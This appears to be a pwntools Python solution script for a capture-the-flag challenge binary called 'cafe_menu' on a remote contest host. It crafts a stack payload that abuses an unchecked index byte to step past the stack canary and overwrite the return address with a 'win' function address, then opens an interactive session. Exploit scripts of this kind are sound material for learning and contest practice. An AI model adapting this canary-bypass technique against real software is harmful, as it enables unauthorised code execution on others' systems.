#!/usr/bin/env python3
from pwn import *
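elf = context.binary = ELF("./cafe_menu", checksec=False)

HOST, PORT = "offsec.m0lecon.it", 13563

# Layout values recovered for this binary. They are referenced by name in the
# payload below instead of being repeated as literals that drift out of sync.
BUF_LEN = 48           # filler bytes before the index byte
AFTER_CANARY = 0x3F    # index value that steers the write just past the canary
# CANARY_OFF = 50      (recorded offset from the original; unused)
SAVED_RBP_LEN = 8      # saved rbp sits between the canary and the return address
WIN_ADDR = 0x401262    # labelled "win" in the original; no symbol lookup is done

# Remote is the default (same as before); pass LOCAL on the command line to
# run against the local binary instead.
p = process(elf.path) if args.LOCAL else remote(HOST, PORT)

print(p.recvline())

# We can overwrite IDX to make it write on the stack after the canary position.
# Presumably the index is not bounds-checked, so the later write is steered
# around the canary rather than through it — a length/range check on the index
# in the target would close this.
payload = flat(
    b"A" * BUF_LEN,
    p8(AFTER_CANARY),       # After canary offset found
    b"A" * SAVED_RBP_LEN,   # Skip rbp
    p64(WIN_ADDR),          # win
    b"\xff",                # trailing byte kept from the original; purpose not stated
)

p.send(payload)

print(p.recvline())

p.interactive()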